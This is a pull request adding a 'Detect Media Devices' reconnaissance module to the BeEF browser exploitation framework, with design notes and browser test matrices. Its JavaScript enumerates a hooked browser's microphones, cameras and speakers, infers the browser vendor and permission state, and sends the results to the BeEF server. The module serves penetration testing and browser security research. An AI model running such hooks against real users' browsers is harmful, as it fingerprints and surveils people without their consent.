### PR TITLE
Add detect_media_devices browser module

### DIFF
--- a/modules/browser/detect_media_devices/command.js
+++ b/modules/browser/detect_media_devices/command.js
@@ -1,0 +1,47 @@
+//
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function () {
+    if (typeof navigator.mediaDevices === 'undefined' ||
+        typeof navigator.mediaDevices.enumerateDevices !== 'function') {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>,
+            "error=" + encodeURIComponent("API not available in this browser"),
+            beef.status.error());
+        return;
+    }
+
+    navigator.mediaDevices.enumerateDevices()
+        .then(function (devices) {
+            var result = {
+                audioinput:  { count: 0, labels: [] },
+                audiooutput: { count: 0, labels: [] },
+                videoinput:  { count: 0, labels: [] }
+            };
+            devices.forEach(function (device) {
+                if (result[device.kind]) {
+                    result[device.kind].count++;
+                    if (device.label) {
+                        result[device.kind].labels.push(device.label);
+                    }
+                }
+            });
+
+            var body =
+                "audioinput_count="    + result.audioinput.count +
+                "&audioinput_labels="  + encodeURIComponent(result.audioinput.labels.join(", ")) +
+                "&audiooutput_count="  + result.audiooutput.count +
+                "&audiooutput_labels=" + encodeURIComponent(result.audiooutput.labels.join(", ")) +
+                "&videoinput_count="   + result.videoinput.count +
+                "&videoinput_labels="  + encodeURIComponent(result.videoinput.labels.join(", "));
+
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, body, beef.status.success());
+        })
+        .catch(function (err) {
+            beef.net.send("<%= @command_url %>", <%= @command_id %>,
+                "error=" + encodeURIComponent("Error: " + (err.message || String(err))),
+                beef.status.error());
+        });
+});

--- a/modules/browser/detect_media_devices/config.yaml
+++ b/modules/browser/detect_media_devices/config.yaml
@@ -1,0 +1,16 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_media_devices:
+            enable: true
+            category: "Browser"
+            name: "Detect Media Devices"
+            description: "This module enumerates media input/output devices (microphones, cameras, speakers) available to the hooked browser via navigator.mediaDevices.enumerateDevices()."
+            authors: ["Sethumadhavan", "bcoles"]
+            target:
+                not_working: ["IE"]
+                working: ["All"]

--- a/modules/browser/detect_media_devices/module.rb
+++ b/modules/browser/detect_media_devices/module.rb
@@ -1,0 +1,18 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_media_devices < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['audioinput_count']   = @datastore['audioinput_count']   unless @datastore['audioinput_count'].nil?
+    content['audioinput_labels']  = @datastore['audioinput_labels']  unless @datastore['audioinput_labels'].nil?
+    content['audiooutput_count']  = @datastore['audiooutput_count']  unless @datastore['audiooutput_count'].nil?
+    content['audiooutput_labels'] = @datastore['audiooutput_labels'] unless @datastore['audiooutput_labels'].nil?
+    content['videoinput_count']   = @datastore['videoinput_count']   unless @datastore['videoinput_count'].nil?
+    content['videoinput_labels']  = @datastore['videoinput_labels']  unless @datastore['videoinput_labels'].nil?
+    content['error']              = @datastore['error']              unless @datastore['error'].nil?
+    save content
+  end
+end


### PR DESCRIPTION
## Category

Module

## Feature/Issue Description

**Q:** Please give a brief summary of your feature/fix
**A:**  This PR intends to add a new browser-side recon module called  `Detect Media Devices` wrapping `navigator.mediaDevices.enumerateDevices()` to enumerate the hooked browser's microphones, cameras, and speakers. 
_Pre Permission_ : Fully passive where no permission prompt is granted by user, no device is opened, no camera/mic indicator activates. The module returns counts for whichever kinds the browser is willing to enumerate pre-permission (please see browser divergence below), with empty-string labels for those kinds.Find the matrix below

## Pre-permission behavior matrix

State before any `getUserMedia` consent has been granted to the origin. Assumes the machine has hardware for each kind (the common case).

**Legend:** ⬜ Empty-label placeholder (count capped at 1, "at least one exists") &nbsp;·&nbsp; ❌ Kind absent from enumerated list

| Browser | `audioinput` (mic) | `videoinput` (camera) | `audiooutput` (speakers) |
|---|---|---|---|
| **Chrome** | ⬜ Placeholder | ⬜ Placeholder | ⬜ Placeholder |
| **Firefox 115+** | ⬜ Placeholder | ⬜ Placeholder | ❌ Absent |
| **Safari 14+** | ⬜ Placeholder | ⬜ Placeholder | ❌ Absent |

**Key divergence:** Chrome enumerates all three kinds pre-permission; Firefox and Safari omit `audiooutput` entirely. Firefox shipped this restriction in Firefox 115 (June 2023, [Bug #1528042](https://bugzilla.mozilla.org/show_bug.cgi?id=1528042)). Safari shipped equivalent restrictions in Safari 14 (per Mozilla's [intent-to-ship thread](https://groups.google.com/a/mozilla.org/g/dev-platform/c/AJp9KF5Ml3w)). Chrome has not implemented these restrictions as of writing. All three behaviors are W3C-spec-compliant and the [spec](https://www.w3.org/TR/mediacapture-streams/) is permissive about pre-permission output.

**When hardware is absent for a kind** (e.g., headless Linux, audio-stripped corporate workstation, certain VMs):

- All three browsers omit `audioinput` if no microphone hardware exists. So `audioinput_count=0` is a **uniform cross-browser signal** meaning "no mic on this machine."
- Same logic for `videoinput`: `videoinput_count=0` means "no camera," uniform across browsers.
- One thing to be aware of :  `audiooutput_count=0`:** In Chrome it means "no speakers exist on the machine," on Firefox / Safari it means "speakers may or may not exist, can't always mean pre-permission." 

_Post-permission_ : Post-permission, the module shows real labels and accurate counts for kinds whose consent surface was granted by the user's getUserMedia. Kinds NOT granted permission stay in pre-permission placeholder state (count capped at 1, label empty).
Also for post permission  each kind unlocks only when the user gives consent for that specific kind. But audio is an exception. if the permsission is granted for only one audio kind in hooked browser, the permission is bundled for both the audio kind and the enumerate detail will consist of both audio kind, label and count. This is  verified across all three major browser engines on macOS. Find the matrix below
## Post-permission behavior matrix

**Legend:** ✅ Real labels exposed, accurate count &nbsp;·&nbsp; ⬜ Empty-label placeholder (count capped at 1) &nbsp;·&nbsp; ❌ Kind absent from enumerated list

| User grants `getUserMedia(...)` with | `audioinput` (mic) | `videoinput` (camera) | `audiooutput` (speakers) |
|---|---|---|---|
| `{ audio: true }` &nbsp;(mic only) | ✅ Real | ⬜ Placeholder | ✅ Real *(bundled with audioinput)* |
| `{ video: true }` &nbsp;on **Chrome** | ⬜ Placeholder | ✅ Real | ⬜ Placeholder |
| `{ video: true }` &nbsp;on **Firefox / Safari** | ⬜ Placeholder | ✅ Real | ❌ Absent |
| `{ audio: true, video: true }` | ✅ Real | ✅ Real | ✅ Real |

**Key pattern:** The `audiooutput` column reveals real labels (✅) only when audio consent was granted and never from video-only consent. The audio surface (`audioinput` + `audiooutput`) bundles as one privacy target. The video surface (`videoinput`) is strictly per-kind. This asymmetry is consistent across all three engines.

Closes #3542 (raised by @bcoles).

**Q:** Give a technical rundown of what you have changed (if applicable)
**A:** Three new files in the standard 3-file module pattern (`command.js` / `module.rb` / `config.yaml`), borrowed template from `modules/browser/detect_lastpass/`. `command.js` calls `enumerateDevices()`, groups results by `kind`, and POSTs via `beef.net.send`. Errors from Missing-API and exception are reported using `beef.status.error()`. `module.rb` stores six form-body keys into `@datastore` and `save`s them. No new dependencies.

Two design notes:

1. **Multi-key form body, not a single JSON value.** BeEF's display layer (`core/main/handlers/commands.rb:83`) wraps every result body under a `'data':` key. A URL-encoded JSON blob renders as `%7B%22audioinput%22...` — unreadable. Using  `audioinput_count=...&audioinput_labels=...` (one key per data point) which is an existing multi-key pattern  in `webcam_html5`'.

2. **Permission-state insight in the count.** Pre-permission, `enumerateDevices()` returns one placeholder per kind that exists. Post-permission will return the full inventory. So the count alone can be considered as a permission-state signal, independent of labels which are generic pre permission. 
Please note here re: browser divergence: There's also a vendor signal, meaning this will tell us the kind or type of browsers,  in the pre-permission *shape*: Chrome lists all 3 kinds, while Firefox 115+ and Safari 14+ list only 2 (no `audiooutput`), per [Mozilla Bug #1528042](https://bugzilla.mozilla.org/show_bug.cgi?id=1528042). 


## Test Cases

**Q:** Describe your test cases, what you have covered and if there are any use cases that still need addressing.
**A:** Tested manually on macOS against BeEF's `/demos/basic.html` hooked demo page. Screenshots below.

Chrome
<img width="1920" height="1080" alt="chrome-post-permission" src="https://github.com/user-attachments/assets/2c74d9ca-6f62-42df-819c-eb1eb7f2ec83" />
<img width="1920" height="1080" alt="chrome-pre-permission" src="https://github.com/user-attachments/assets/0c750b52-8ebc-4fdc-aa20-19d482bcc5ae" />

Firefox
<img width="1920" height="1080" alt="firefox-post-permission" src="https://github.com/user-attachments/assets/4b8603ce-d532-4bba-ba49-61fa2d3d5791" />
<img width="1920" height="1080" alt="firefox-pre-permission" src="https://github.com/user-attachments/assets/83bf5f6e-a077-4e7e-ae81-4fa5b29ed676" />

Safari
<img width="1920" height="1080" alt="safari-post-permission" src="https://github.com/user-attachments/assets/0a9d7d31-e3e1-42b4-b006-c904a951c7bd" />
<img width="1920" height="1080" alt="safari-pre-permission" src="https://github.com/user-attachments/assets/cf3530ac-a02c-4cf3-9cd9-43a483b22dc5" />



| Browser | Pre-permission | Post-permission |
|---|---|---|
| Chrome (latest) | 3 entries: 1/1/1, empty labels | 10 entries: `(Built-in)` / `(Virtual)` / `(Aggregate)` suffixes |
| Firefox 115+ | 2 entries: 1/0/1 (no `audiooutput`) | 9 entries: plain labels, `Default` audiooutput deduped |
| Safari 14+ | 2 entries: 1/0/1 (matches Firefox) | 10 entries: `Default - <device>` audiooutput prefix; surfaces Continuity Camera Desk View |

**Manual reproduction (5 steps):**

1. Load `http://<beef>:3000/demos/basic.html` to hook a browser.
2. Admin panel - hooked browser - Commands - Browser - `Detect Media Devices` - Execute. Observe the pre-permission result in Module Results History.
4. In a DevTools console on the hooked tab, run `navigator.mediaDevices.getUserMedia({audio:true, video:true}).then(s => s.getTracks().forEach(t => t.stop()))` and click Allow to allow permission to devices.
5. Re-Execute the module and observe the post-permission result.

